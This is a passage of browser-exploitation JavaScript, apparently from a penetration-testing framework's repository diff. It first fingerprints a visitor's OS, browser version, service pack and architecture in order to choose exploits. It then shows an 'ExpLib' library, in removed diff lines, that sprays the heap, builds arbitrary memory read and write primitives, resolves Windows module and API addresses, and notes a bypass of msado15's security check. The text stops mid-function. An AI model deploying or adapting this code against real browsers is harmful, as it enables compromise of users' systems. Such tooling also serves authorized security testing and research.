document.createElement('main') &&
|
||||
document.createElement('main').constructor === window['HTMLElement']) {
|
||||
ua_version = '21.0';
|
||||
} else if ('imul' in Math) {
|
||||
ua_version = '20.0';
|
||||
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
|
||||
ua_version = '19.0';
|
||||
} else if ('devicePixelRatio' in window) {
|
||||
ua_version = '18.0';
|
||||
} else if ('createElement' in document &&
|
||||
document.createElement('iframe') &&
|
||||
'sandbox' in document.createElement('iframe')) {
|
||||
ua_version = '17.0';
|
||||
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
|
||||
ua_version = '16.0';
|
||||
} else if ('HTMLSourceElement' in window &&
|
||||
HTMLSourceElement.prototype &&
|
||||
'media' in HTMLSourceElement.prototype) {
|
||||
ua_version = '15.0';
|
||||
} else if ('mozRequestPointerLock' in document.body) {
|
||||
ua_version = '14.0';
|
||||
} else if ('Map' in window) {
|
||||
ua_version = "13.0";
|
||||
} else if ('mozConnection' in navigator) {
|
||||
ua_version = "12.0";
|
||||
} else if ('mozVibrate' in navigator) {
|
||||
ua_version = "11.0";
|
||||
} else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) {
|
||||
ua_version = "10.0";
|
||||
} else if ('doNotTrack' in navigator) {
|
||||
ua_version = "9.0";
|
||||
} else if ('insertAdjacentHTML' in document.body) {
|
||||
ua_version = "8.0";
|
||||
} else if ('ondeviceorientation' in window && !('createEntityReference' in document)) {
|
||||
ua_version = "7.0";
|
||||
} else if ('MozBlobBuilder' in window) {
|
||||
ua_version = "6.0";
|
||||
} else if ('isGenerator' in Function) {
|
||||
ua_version = "5.0";
|
||||
} else if ('isArray' in Array) {
|
||||
ua_version = "4.0";
|
||||
} else if (document.readyState) {
|
||||
ua_version = "3.6";
|
||||
} else if (String.trimRight) {
|
||||
ua_version = "3.5";
|
||||
} else if (document.getElementsByClassName) {
|
||||
ua_version = "3";
|
||||
} else if (window.Iterator) {
|
||||
ua_version = "2";
|
||||
} else if (Array.every) {
|
||||
ua_version = "1.5";
|
||||
} else {
|
||||
ua_version = "1";
|
||||
}
|
||||
if (navigator.oscpu != navigator.platform) {
|
||||
ua_is_lying = true;
|
||||
}
|
||||
// oscpu is unaffected by changes in the useragent and has values like:
|
||||
// "Linux i686"
|
||||
// "Windows NT 6.0"
|
||||
// haven't tested on 64-bit Windows
|
||||
version = navigator.oscpu;
|
||||
if (version.match(/i.86/)) {
|
||||
arch = arch_x86;
|
||||
}
|
||||
if (version.match(/x86_64/)) {
|
||||
arch = arch_x86_64;
|
||||
}
|
||||
if (version.match(/Windows/)) {
|
||||
os_name = oses_windows;
|
||||
// Technically these will mismatch server OS editions, but those are
|
||||
// rarely used as client systems and typically have the same exploit
|
||||
// characteristics as the associated client.
|
||||
switch(version) {
|
||||
case "Windows NT 5.0": os_name = "Windows 2000"; break;
|
||||
case "Windows NT 5.1": os_name = "Windows XP"; break;
|
||||
case "Windows NT 5.2": os_name = "Windows 2003"; break;
|
||||
case "Windows NT 6.0": os_name = "Windows Vista"; break;
|
||||
case "Windows NT 6.1": os_name = "Windows 7"; break;
|
||||
case "Windows NT 6.2": os_name = "Windows 8"; break;
|
||||
case "Windows NT 6.3": os_name = "Windows 8.1"; break;
|
||||
}
|
||||
}
|
||||
if (version.match(/Linux/)) {
|
||||
os_name = oses_linux;
|
||||
}
|
||||
// end navigator.oscpu checks
|
||||
} else if (typeof ScriptEngineMajorVersion == "function") {
|
||||
// Then this is IE and we can very reliably detect the OS.
|
||||
// Need to add detection for IE on Mac. Low priority, since we
|
||||
// don't have any sploits for it yet and it's a very low market
|
||||
// share.
|
||||
os_name = oses_windows;
|
||||
ua_name = clients_ie;
|
||||
version_maj = ScriptEngineMajorVersion().toString();
|
||||
version_min = ScriptEngineMinorVersion().toString();
|
||||
version_build = ScriptEngineBuildVersion().toString();
|
||||
|
||||
version = version_maj + version_min + version_build;
|
||||
|
||||
//document.write("ScriptEngine: "+version+"<br />");
|
||||
switch (version){
|
||||
case "514615":
|
||||
// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
|
||||
ua_version = "5.0";
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "515907":
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
|
||||
break;
|
||||
case "518513":
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP4";
|
||||
break;
|
||||
case "566626":
|
||||
// IE 6.0.2600.0000, XP SP0 English
|
||||
// IE 6.0.2800.1106, XP SP1 English
|
||||
ua_version = "6.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "568515":
|
||||
// IE 6.0.3790.0, 2003 Standard SP0 English
|
||||
ua_version = "6.0";
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "568820":
|
||||
// IE 6.0.2900.2180, xp sp2 english
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "568827":
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "568831": //XP SP2 -OR- 2K SP4
|
||||
if (os_name == "2000"){
|
||||
os_sp = "SP4";
|
||||
}
|
||||
else{
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
}
|
||||
break;
|
||||
case "568832":
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "568837":
|
||||
// IE 6.0.2900.2180, XP Professional SP2 Korean
|
||||
ua_version = "6.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "5716599":
|
||||
// IE 7.0.5730.13, XP Professional SP3 English
|
||||
// IE 6.0.2900.5512, XP Professional SP3 English
|
||||
// IE 6.0.2900.5512, XP Professional SP3 Spanish
|
||||
//
|
||||
// Since this scriptengine applies to more than one major version of
|
||||
// IE, rely on the object detection below to determine ua_version.
|
||||
//ua_version = "6.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "575730":
|
||||
// IE 7.0.5730.13, Server 2003 Standard SP2 English
|
||||
// IE 7.0.5730.13, Server 2003 Standard SP1 English
|
||||
// IE 7.0.5730.13, XP Professional SP2 English
|
||||
// Rely on the user agent matching above to determine the OS.
|
||||
// This will incorrectly identify 2k3 SP1 as SP2
|
||||
ua_version = "7.0";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "5718066":
|
||||
// IE 7.0.5730.13, XP Professional SP3 English
|
||||
ua_version = "7.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "5722589":
|
||||
// IE 7.0.5730.13, XP Professional SP3 English
|
||||
ua_version = "7.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "576000":
|
||||
// IE 7.0.6000.16386, Vista Ultimate SP0 English
|
||||
ua_version = "7.0";
|
||||
os_name = "Windows Vista";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "580":
|
||||
// IE 8.0.7100.0, Windows 7 English
|
||||
// IE 8.0.7100.0, Windows 7 64-bit English
|
||||
case "5816385":
|
||||
// IE 8.0.7600.16385, Windows 7 English
|
||||
case "5816475":
|
||||
case "5816762":
|
||||
// IE 8.0.7600.16385, Windows 7 English
|
||||
ua_version = "8.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "5817514":
|
||||
// IE 8.0.7600.17514, Windows 7 SP1 English
|
||||
ua_version = "8.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "5818702":
|
||||
// IE 8.0.6001.18702, XP Professional SP3 English
|
||||
case "5822960":
|
||||
// IE 8.0.6001.18702, XP Professional SP3 Greek
|
||||
ua_version = "8.0";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "9016406":
|
||||
// IE 9.0.7930.16406, Windows 7 64-bit
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "9016441":
|
||||
// IE 9.0.8112.16421, Windows 7 32-bit English
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016443":
|
||||
// IE 9.0.8112.16421, Windows 7 Polish
|
||||
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016446":
|
||||
// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
|
||||
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016464":
|
||||
// browsershots.org, MSIE 7.0 / Windows 2008 R2
|
||||
os_name = "Windows 2008 R2";
|
||||
ua_version = "9.0";
|
||||
break;
|
||||
case "9016470":
|
||||
// IE 9.0.8112.16421 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016502":
|
||||
// IE 9.0.8112.16502 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016506":
|
||||
// IE 9.0.8112.16506 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016514":
|
||||
// IE 9.0.8112.16514 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016520":
|
||||
// IE 9.0.8112.16520 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016526":
|
||||
// IE 9.0.8112.16526 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016533":
|
||||
// IE 9.0.8112.16533 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "10016720":
|
||||
// IE 10.0.9200.16721 / Windows 7 SP1
|
||||
ua_version = "10.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "11016428":
|
||||
// IE 11.0.9600.16428 / Windows 7 SP1
|
||||
ua_version = "11.0";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "10016384":
|
||||
// IE 10.0.9200.16384 / Windows 8 x86
|
||||
ua_version = "10.0";
|
||||
os_name = "Windows 8";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "11016426":
|
||||
// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
|
||||
ua_version = "11.0";
|
||||
os_name = "Windows 8.1";
|
||||
break;
|
||||
case "1000":
|
||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||
ua_version = "10.0";
|
||||
os_name = "Windows 8";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "1100":
|
||||
// IE 11.0.10011.0 Windows 10.0 (Build 10074) English - insider preview
|
||||
ua_version = "11.0";
|
||||
os_name = "Windows 10";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
default:
|
||||
unknown_fingerprint = version;
|
||||
break;
|
||||
}
|
||||
|
||||
if (!ua_version) {
|
||||
// The ScriptEngine functions failed us, try some object detection
|
||||
if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
|
||||
// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
|
||||
try {
|
||||
if (document.__proto__ != undefined) { ua_version = "11.0"; }
|
||||
} catch (e) {}
|
||||
|
||||
// IE 10 detection using nodeName
|
||||
if (!ua_version) {
|
||||
try {
|
||||
var badNode = document.createElement && document.createElement("badname");
|
||||
if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
|
||||
} catch(e) {}
|
||||
}
|
||||
|
||||
// IE 9 detection based on a "Object doesn't support property or method" error
|
||||
if (!ua_version) {
|
||||
try {
|
||||
document.BADNAME();
|
||||
} catch(e) {
|
||||
if (e.message.indexOf("BADNAME") > 0) {
|
||||
ua_version = "9.0";
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// IE8 detection straight from IEBlog. Thank you Microsoft.
|
||||
if (!ua_version) {
|
||||
try {
|
||||
ua_version = "8.0";
|
||||
document.documentElement.style.display = "table-cell";
|
||||
} catch(e) {
|
||||
// This executes in IE7,
|
||||
// but not IE8, regardless of mode
|
||||
ua_version = "7.0";
|
||||
}
|
||||
}
|
||||
} else if (document.compatMode) {
|
||||
ua_version = "6.0";
|
||||
} else if (window.createPopup) {
|
||||
ua_version = "5.5";
|
||||
} else if (window.attachEvent) {
|
||||
ua_version = "5.0";
|
||||
} else {
|
||||
ua_version = "4.0";
|
||||
}
|
||||
switch (navigator.appMinorVersion){
|
||||
case ";SP2;":
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
|
||||
|
||||
//--
|
||||
// Figure out the type of Windows
|
||||
//--
|
||||
if (!ua_is_lying) {
|
||||
version = useragent.toLowerCase();
|
||||
} else if (navigator.oscpu) {
|
||||
// Then this is Gecko and we can get at least os_name without the
|
||||
// useragent
|
||||
version = navigator.oscpu.toLowerCase();
|
||||
} else {
|
||||
// All we have left is the useragent and we know it's lying, so don't bother
|
||||
version = " ";
|
||||
}
|
||||
if (!os_name || 0 == os_name.length) {
|
||||
if (version.indexOf("windows") != -1) { os_name = oses_windows; }
|
||||
else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; }
|
||||
else if (version.indexOf("linux") != -1) { os_name = oses_linux; }
|
||||
}
|
||||
if (os_name == oses_windows) {
|
||||
if (version.indexOf("windows 95") != -1) { os_name = "Windows 95"; }
|
||||
else if (version.indexOf("windows nt 4") != -1) { os_name = "Windows NT"; }
|
||||
else if (version.indexOf("win 9x 4.9") != -1) { os_name = "Windows ME"; }
|
||||
else if (version.indexOf("windows 98") != -1) { os_name = "Windows 98"; }
|
||||
else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000"; }
|
||||
else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP"; }
|
||||
else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003"; }
|
||||
else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
|
||||
else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7"; }
|
||||
else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8"; }
|
||||
else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1"; }
|
||||
}
|
||||
if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
|
||||
if (version.indexOf("gentoo") != -1) { os_vendor = "Gentoo"; }
|
||||
else if (version.indexOf("ubuntu") != -1) { os_vendor = "Ubuntu"; }
|
||||
else if (version.indexOf("debian") != -1) { os_vendor = "Debian"; }
|
||||
else if (version.indexOf("rhel") != -1) { os_vendor = "RHEL"; }
|
||||
else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL"; }
|
||||
else if (version.indexOf("centos") != -1) { os_vendor = "CentOS"; }
|
||||
else if (version.indexOf("fedora") != -1) { os_vendor = "Fedora"; }
|
||||
else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
|
||||
}
|
||||
|
||||
//--
|
||||
// Language
|
||||
//--
|
||||
if (navigator.systemLanguage) {
|
||||
// ie
|
||||
os_lang = navigator.systemLanguage;
|
||||
} else if (navigator.language) {
|
||||
// gecko derivatives, safari, opera
|
||||
os_lang = navigator.language;
|
||||
} else {
|
||||
// some other browser and we don't know how to get the language, so
|
||||
// just guess english
|
||||
os_lang = "en";
|
||||
}
|
||||
|
||||
//--
|
||||
// Architecture
|
||||
//--
|
||||
if (typeof(navigator.cpuClass) != 'undefined') {
|
||||
// Then this is IE or Opera9+ and we can grab the arch directly
|
||||
switch (navigator.cpuClass) {
|
||||
case "x86":
|
||||
arch = arch_x86;
|
||||
break;
|
||||
case "x64":
|
||||
arch = arch_x86_64;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (!arch || 0 == arch.length) {
|
||||
// We don't have the handy-dandy navagator.cpuClass, so infer from
|
||||
// platform
|
||||
version = navigator.platform;
|
||||
//document.write(version + "\\n");
|
||||
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
|
||||
// 64-bit client on Windows 7, 64-bit:
|
||||
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
|
||||
// 32-bit client on Windows 7, 64-bit:
|
||||
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
|
||||
// 32-bit client on Vista, 32-bit, "Compatibility View":
|
||||
// Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
|
||||
//
|
||||
// Report 32-bit client on 64-bit OS as being 32 because exploits will
|
||||
// need to know the bittedness of the process, not the OS.
|
||||
if ( ("Win32" == version) || (version.match(/i.86/)) ) {
|
||||
arch = arch_x86;
|
||||
} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64'))) {
|
||||
arch = arch_x86_64;
|
||||
} else if (-1 != version.indexOf('PPC')) {
|
||||
arch = arch_ppc;
|
||||
}
|
||||
}
|
||||
|
||||
this.ua_is_lying = ua_is_lying;
|
||||
this.os_name = os_name;
|
||||
this.os_vendor = os_vendor;
|
||||
this.os_flavor = os_flavor;
|
||||
this.os_device = os_device;
|
||||
this.os_sp = os_sp;
|
||||
this.os_lang = os_lang;
|
||||
this.arch = arch;
|
||||
this.ua_name = ua_name;
|
||||
this.ua_version = ua_version;
|
||||
this.ua_version = ua_version;
|
||||
|
||||
return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
|
||||
}; // function getVersion
|
||||
|
||||
os_detect.searchVersion = function(needle, haystack) {
|
||||
var index = haystack.indexOf(needle);
|
||||
var found_version;
|
||||
if (index == -1) { return; }
|
||||
found_version = haystack.substring(index+needle.length+1);
|
||||
if (found_version.indexOf(' ') != -1) {
|
||||
// Strip off any junk at the end such as a CLR declaration
|
||||
found_version = found_version.substring(0,found_version.indexOf(' '));
|
||||
}
|
||||
return found_version;
|
||||
};
|
||||
|
||||
|
||||
/*
|
||||
* Return -1 if a < b, 0 if a == b, 1 if a > b
|
||||
*/
|
||||
ua_ver_cmp = function(ver_a, ver_b) {
|
||||
// shortcut the easy case
|
||||
if (ver_a == ver_b) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
a = ver_a.split(".");
|
||||
b = ver_b.split(".");
|
||||
for (var i = 0; i < Math.max(a.length, b.length); i++) {
|
||||
// 3.0 == 3
|
||||
if (!b[i]) { b[i] = "0"; }
|
||||
if (!a[i]) { a[i] = "0"; }
|
||||
|
||||
if (a[i] == b[i]) { continue; }
|
||||
|
||||
a_int = parseInt(a[i]);
|
||||
b_int = parseInt(b[i]);
|
||||
a_rest = a[i].substr(a_int.toString().length);
|
||||
b_rest = b[i].substr(b_int.toString().length);
|
||||
if (a_int < b_int) {
|
||||
return -1;
|
||||
} else if (a_int > b_int) {
|
||||
return 1;
|
||||
} else { // ==
|
||||
// Then we need to deal with the stuff after the ints, e.g.:
|
||||
// "b4pre"
|
||||
if (a_rest == "b" && b_rest.length == 0) {
|
||||
return -1;
|
||||
}
|
||||
if (b_rest == "b" && a_rest.length == 0) {
|
||||
return 1;
|
||||
}
|
||||
// Just give up and try a lexicographical comparison
|
||||
if (a_rest < b_rest) {
|
||||
return -1;
|
||||
} else if (a_rest > b_rest) {
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
}
|
||||
// If we get here, they must be equal
|
||||
return 0;
|
||||
};
|
||||
|
||||
ua_ver_lt = function(a, b) {
|
||||
if (-1 == this.ua_ver_cmp(a,b)) { return true; }
|
||||
return false;
|
||||
};
|
||||
ua_ver_gt = function(a, b) {
|
||||
if (1 == this.ua_ver_cmp(a,b)) { return true; }
|
||||
return false;
|
||||
};
|
||||
ua_ver_eq = function(a, b) {
|
||||
if (0 == this.ua_ver_cmp(a,b)) { return true; }
|
||||
return false;
|
||||
};
|
|
@ -1,426 +0,0 @@
|
|||
|
||||
|
||||
ExpLib = (function() {
|
||||
|
||||
function ExpLib( num_arrays, arr_size, base, payload ) {
|
||||
this.arr1 = null;
|
||||
this.arr2 = null;
|
||||
this.base = base;
|
||||
this.arr_size = arr_size;
|
||||
this.arr_arr = null;
|
||||
// Allows to control the contents of the sprayed memory.
|
||||
// Have into account some array positions will be corrupted
|
||||
// while leaking and modifying things.
|
||||
this.arr_contents = [];
|
||||
|
||||
this.payload = payload;
|
||||
this.modules = {}
|
||||
this.getproc = null;
|
||||
this.loadlibrary = null;
|
||||
|
||||
// Offset to the Origin URL in the Stream, modifying it
|
||||
// allows to bypass msado15.SecurityCheck(), allowing
|
||||
// for example to write stream contents to filesystem.
|
||||
this.stream_origin = 0x44;
|
||||
}
|
||||
|
||||
ExpLib.prototype.resolveAPI = function( modulename, procname ) {
|
||||
var module = this.resolveModule( modulename );
|
||||
|
||||
return this.callAPI( this.getproc, module, this.allocateString(procname) );
|
||||
}
|
||||
|
||||
ExpLib.prototype.resolveModule = function( modulename ) {
|
||||
if ( this.modules[modulename] )
|
||||
return this.modules[modulename];
|
||||
|
||||
var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
|
||||
this.modules[modulename] = module;
|
||||
return module;
|
||||
}
|
||||
|
||||
ExpLib.prototype.spray = function() {
|
||||
this.arr_arr = new Array( num_arrays );
|
||||
|
||||
var decl = "[";
|
||||
|
||||
for ( var i = 0; i < this.arr_size - 1; ++ i ) {
|
||||
decl += '0,';
|
||||
}
|
||||
|
||||
decl += '0';
|
||||
decl += ']';
|
||||
|
||||
for ( var i = 0; i < num_arrays; ++ i ) {
|
||||
this.arr_arr[i] = eval(decl);
|
||||
for(var j = 0; j < this.arr_contents.length; j++) {
|
||||
this.arr_arr[i][j] = this.arr_contents[j];
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
// Should be used before calling spray()
|
||||
ExpLib.prototype.setArrContents = function(contents) {
|
||||
for(var i = 0; i < this.arr_size && i < contents.length; i++) {
|
||||
this.arr_contents[i] = contents[i];
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.setValue = function(i1, i2, v) {
|
||||
this.arr_arr[i1][i2] = v;
|
||||
}
|
||||
|
||||
|
||||
ExpLib.prototype.setValueByAddr = function(index, addr, v) {
|
||||
this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
|
||||
}
|
||||
|
||||
ExpLib.prototype.read32 = function(addr) {
|
||||
if ( addr % 4 ) {
|
||||
// error
|
||||
}
|
||||
|
||||
if ( addr >= this.arr2_member_base ) {
|
||||
return this.arr2[(addr - this.arr2_member_base)/4];
|
||||
} else {
|
||||
return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.write32 = function(addr, value) {
|
||||
if ( addr % 4 ) {
|
||||
// error
|
||||
}
|
||||
|
||||
if ( value >= 0x80000000 )
|
||||
value = -(0x100000000 - value);
|
||||
|
||||
//alert(((addr - this.arr2_member_base)/4).toString(16));
|
||||
if ( addr >= this.arr2_member_base ) {
|
||||
this.arr2[(addr - this.arr2_member_base)/4] = value;
|
||||
} else {
|
||||
this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.read8 = function(addr) {
|
||||
var value = this.read32( addr & 0xfffffffc );
|
||||
switch ( addr % 4 ) {
|
||||
case 0: return (value & 0xff);
|
||||
case 1: return ((value >> 8) & 0xff);
|
||||
case 2: return ((value >> 16) & 0xff);
|
||||
case 3: return ((value >> 24) & 0xff);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
ExpLib.prototype.write8 = function(addr, value) {
|
||||
var original_value = this.read32( addr & 0xfffffffc );
|
||||
var new_value;
|
||||
|
||||
switch ( addr % 4 ) {
|
||||
case 0:
|
||||
new_value = (original_value & 0xffffff00) | (value & 0xff);
|
||||
break;
|
||||
|
||||
case 1:
|
||||
new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
|
||||
break;
|
||||
case 2:
|
||||
new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
|
||||
break;
|
||||
case 3:
|
||||
new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
this.write32( addr & 0xfffffffc, new_value );
|
||||
}
|
||||
|
||||
|
||||
ExpLib.prototype.writeBytes = function(addr, bytes) {
|
||||
for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
|
||||
var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
|
||||
((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
|
||||
|
||||
this.write32( addr + i, value );
|
||||
}
|
||||
|
||||
for ( ; i < bytes.length; ++ i ) {
|
||||
this.write8( addr + i, bytes[i] );
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.writeString = function(addr, s) {
|
||||
var bytes = [];
|
||||
var i = 0;
|
||||
for ( ; i < s.length; ++ i ) {
|
||||
bytes[i] = s.charCodeAt(i);
|
||||
}
|
||||
|
||||
bytes[i] = 0;
|
||||
|
||||
this.writeBytes( addr, bytes );
|
||||
}
|
||||
|
||||
ExpLib.prototype.writeStringW = function(addr, s) {
|
||||
var bytes = [];
|
||||
var i = 0;
|
||||
for ( ; i < s.length; ++i ) {
|
||||
bytes[i * 2] = s.charCodeAt(i);
|
||||
bytes[i * 2 + 1] = 0;
|
||||
}
|
||||
|
||||
bytes[s.length * 2] = 0;
|
||||
bytes[s.length * 2 + 1] = 0;
|
||||
|
||||
this.writeBytes( addr, bytes );
|
||||
}
|
||||
|
||||
ExpLib.prototype.read16 = function(addr) {
|
||||
if ( addr % 2 ) {
|
||||
// error, not aligned
|
||||
}
|
||||
|
||||
var value = this.read32( addr & 0xfffffffc );
|
||||
switch ( addr % 4 ) {
|
||||
case 0: return (value & 0xffff);
|
||||
case 1: return ((value >> 8) & 0xffff);
|
||||
case 2: return ((value >> 16) & 0xffff);
|
||||
case 3: /*not supported*/ break;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
ExpLib.prototype.strequal = function(addr, s) {
|
||||
for ( var i = 0; i < s.length; ++ i ) {
|
||||
if ( this.read8(addr + i) != s.charCodeAt(i) )
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
|
||||
ExpLib.prototype.getModuleBase = function(addr) {
|
||||
|
||||
var cur_addr = addr;
|
||||
|
||||
while ( cur_addr > 0 ) {
|
||||
|
||||
if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
|
||||
return cur_addr;
|
||||
}
|
||||
|
||||
cur_addr -= 0x10000;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
||||
ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
|
||||
var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
|
||||
var cur_table = import_table;
|
||||
|
||||
while ( cur_table < import_table + 0x1000 ) {
|
||||
|
||||
var name_addr = base + this.read32(cur_table + 12);
|
||||
if ( this.strequal( name_addr, name ) ) {
|
||||
var iat = base + this.read32(cur_table + 16);
|
||||
var func = this.read32(iat);
|
||||
while ( 0 == func ) {
|
||||
iat += 4;
|
||||
func = this.read32(iat);
|
||||
}
|
||||
|
||||
return this.getModuleBase( func & 0xFFFF0000 );
|
||||
|
||||
}
|
||||
|
||||
cur_table += 20;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
ExpLib.prototype.getProcAddress = function(base, procname) {
|
||||
var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
|
||||
var num_functions = this.read32( export_table + 20 );
|
||||
var addr_functions = base + this.read32( export_table + 28 );
|
||||
